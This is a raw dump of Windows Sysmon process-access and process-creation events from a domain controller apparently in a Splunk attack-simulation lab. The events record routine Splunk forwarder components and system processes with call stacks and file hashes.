15:59:09.945{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.945{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.945{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-534D-6008-1B06-00000000A301}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.945{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-534D-6008-1B06-00000000A301}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.946{7901BC46-534D-6008-1B06-00000000A301}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.554{7901BC46-534D-6008-1A06-00000000A301}78283876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-534D-6008-1A06-00000000A301}7828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-534D-6008-1A06-00000000A301}7828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-534D-6008-1A06-00000000A301}7828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.414{7901BC46-534D-6008-1A06-00000000A301}7828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.820{7901BC46-534E-6008-1C06-00000000A301}57364160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.663{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-534E-6008-1C06-00000000A301}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.663{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-534E-6008-1C06-00000000A301}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.663{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-534E-6008-1C06-00000000A301}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.664{7901BC46-534E-6008-1C06-00000000A301}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:10.085{7901BC46-534D-6008-1B06-00000000A301}77604152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:11.335{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-534F-6008-1D06-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:11.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:11.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:11.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 